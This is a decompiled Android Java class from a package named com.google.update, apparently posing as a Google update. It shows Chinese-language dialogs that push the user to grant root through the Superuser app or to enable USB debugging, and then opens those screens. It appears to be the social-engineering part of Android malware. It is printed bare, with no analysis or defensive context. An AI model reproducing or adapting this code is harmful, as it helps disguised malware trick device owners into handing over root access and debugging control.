package com.google.update;

import android.app.Activity;
import android.app.AlertDialog;
import android.content.DialogInterface;
import android.content.Intent;
import android.os.Bundle;
import android.widget.LinearLayout;
/* loaded from: classes.dex */
public class Dialog extends Activity {
    private static final int DIALOG_GRANT_SET = 1;
    private static final int DIALOG_GRANT_SU = 0;
    private String type = null;
    private String msg = null;

    @Override // android.app.Activity
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        LinearLayout layout = new LinearLayout(this);
        layout.setOrientation(1);
        LinearLayout.LayoutParams params = new LinearLayout.LayoutParams(-1, -2);
        layout.setLayoutParams(params);
        layout.setGravity(17);
        setContentView(layout);
        Bundle bundle = getIntent().getExtras();
        if (bundle == null) {
            finish();
        }
        this.msg = bundle.getString("MSG");
        this.type = bundle.getString("TYPEdsada");
        if ("su".equals(this.type)) {
            showDialog(0);
        } else {
            showDialog(1);
        }
    }

    @Override // android.app.Activity
    protected android.app.Dialog onCreateDialog(int id) {
        switch (id) {
            case 0:
                android.app.Dialog dialog = new AlertDialog.Builder(this).setIcon(17301659).setTitle("请授权").setMessage(this.msg).setNeutralButton("确认", new DialogInterface.OnClickListener() { // from class: com.google.update.Dialog.1
                    @Override // android.content.DialogInterface.OnClickListener
                    public void onClick(DialogInterface dialog2, int which) {
                        Intent intent = Dialog.this.getPackageManager().getLaunchIntentForPackage("com.noshufou.android.su");
                        intent.setFlags(268435456);
                        Dialog.this.startActivity(intent);
                        Dialog.this.finish();
                    }
                }).create();
                return dialog;
            case 1:
                android.app.Dialog dialog2 = new AlertDialog.Builder(this).setIcon(17301659).setTitle("打开USB调试").setMessage(this.msg).setNeutralButton("确认", new DialogInterface.OnClickListener() { // from class: com.google.update.Dialog.2
                    @Override // android.content.DialogInterface.OnClickListener
                    public void onClick(DialogInterface dialog3, int which) {
                        Dialog.this.startActivity(new Intent("com.android.settings.APPLICATION_DEVELOPMENT_SETTINGS"));
                        Dialog.this.finish();
                    }
                }).create();
                return dialog2;
            default:
                finish();
                return null;
        }
    }
}
